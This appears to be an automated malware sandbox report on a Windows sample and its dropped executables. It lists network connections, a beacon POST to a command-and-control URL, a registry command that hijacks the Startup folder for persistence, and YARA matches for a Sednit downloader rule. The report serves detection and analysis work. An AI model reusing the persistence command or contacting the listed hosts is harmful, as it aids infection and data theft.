      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.111
      Source: unknownHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 34 31 34 34 30 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=414408&un=user&dm=&av=13&lv=0
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.1.8:443 -> 192.168.2.5:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49794 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49869 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49874 version: TLS 1.2
      Source: vms.exe, 0000000E.00000002.406148780.000000000152A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: cmd.exeProcess created: 63

      System Summary:

      barindex
      PE file contains section with special charsShow sources
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name:
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: We7WnoqeXe.exeStatic PE information: section name: `~\1
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: vms.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: slhost.exe.1.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: rnyuf.exe.14.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: System.exe.15.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: vms[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost[1].exe0.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: slhost.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: vms.exe.19.drStatic PE information: section name:
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeCode function: 1_2_03CA12801_2_03CA1280
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeCode function: 1_2_03CA12901_2_03CA1290
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CC785F19_2_00CC785F
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CA487019_2_00CA4870
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CC002019_2_00CC0020
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C831C019_2_00C831C0
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACDDC19_2_00CACDDC
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACDE819_2_00CACDE8
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACD4C19_2_00CACD4C
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACD5019_2_00CACD50
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACD1519_2_00CACD15
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00CACE0019_2_00CACE00
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C93B4719_2_00C93B47
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: We7WnoqeXe.exeStatic PE information: Resource name: RT_ACCELERATOR type: Android binary XML
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys[1].exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UpSys.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
      Source: System.exe.15.drStatic PE information: Number of sections : 11 > 10
      Source: slhost[1].exe0.19.drStatic PE information: Number of sections : 11 > 10
      Source: slhost.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: slhost.exe.19.drStatic PE information: Number of sections : 11 > 10
      Source: We7WnoqeXe.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
      Source: 0000002B.00000003.466253195.00000000030D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000003D.00000002.492202366.00000000007ED000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000050.00000003.513976385.0000000003011000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000048.00000002.505878265.00000000007ED000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000074.00000003.528052152.0000000001991000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000064.00000003.513753577.0000000003051000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000048.00000003.488087927.0000000002FE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000003D.00000003.468230978.0000000003101000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 00000050.00000002.521205790.00000000007EB000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: 0000002B.00000002.469682107.00000000007EB000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: Process Memory Space: UpSys.exe PID: 1112, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: Process Memory Space: UpSys.exe PID: 6856, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: Process Memory Space: UpSys.exe PID: 5452, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: Process Memory Space: UpSys.exe PID: 6036, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: Process Memory Space: UpSys.exe PID: 1500, type: MEMORYSTRMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Users\user\AppData\Local\Temp\wchuwml, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
